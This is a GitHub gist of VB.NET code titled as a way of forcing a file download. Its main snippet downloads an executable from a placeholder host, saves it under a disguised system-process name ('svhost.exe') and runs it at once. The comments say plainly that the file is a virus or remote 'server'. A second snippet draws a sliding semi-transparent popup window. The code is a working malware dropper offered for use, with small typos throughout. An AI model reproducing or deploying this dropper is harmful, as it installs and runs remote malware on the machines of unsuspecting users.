Skip to content

Instantly share code, notes, and snippets.

@sadik-fattah
Created October 30, 2021 11:22
Show Gist options
  • Save sadik-fattah/64e3ec7239ea1790e89b2645d255e7e4 to your computer and use it in GitHub Desktop.
Save sadik-fattah/64e3ec7239ea1790e89b2645d255e7e4 to your computer and use it in GitHub Desktop.
a forcing downloding file with vb
'in general declaration
import system.net
'=========================
'in class or load form
dim link as string = "http://domain.com/server.exe"'your direct link server or patsh
dim serv as string = "c:/svhost.exe"'The path that you want to put a virus in it
my.computer.network.downloadFile(link,serv)'download the server from internet
proccess.start(serv)'star the server
The code of PopUp window :
Private Sub Form1_Load(ByVal sender As System.Object,
ByVal e As System.EventArgs) Handles MyBase.Load
'Me.Visible = True
Me.Opacity = 60
Dim x As Integer
Dim y As Integer
x = Screen.PrimaryScreen.WorkingArea.Width
y = Screen.PrimaryScreen.WorkingArea.Height - Me.Height
Do Until x = Screen.PrimaryScreen.WorkingArea.Width - Me.Width
x = x - 1
Me.Location = New Point(x + 0.1, y - 0.01)
Loop
End Sub
Private Sub Button1_Click(ByVal sender As System.Object,
ByVal e As System.EventArgs) Handles Button1.Click
Me.Close()
End Sub
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment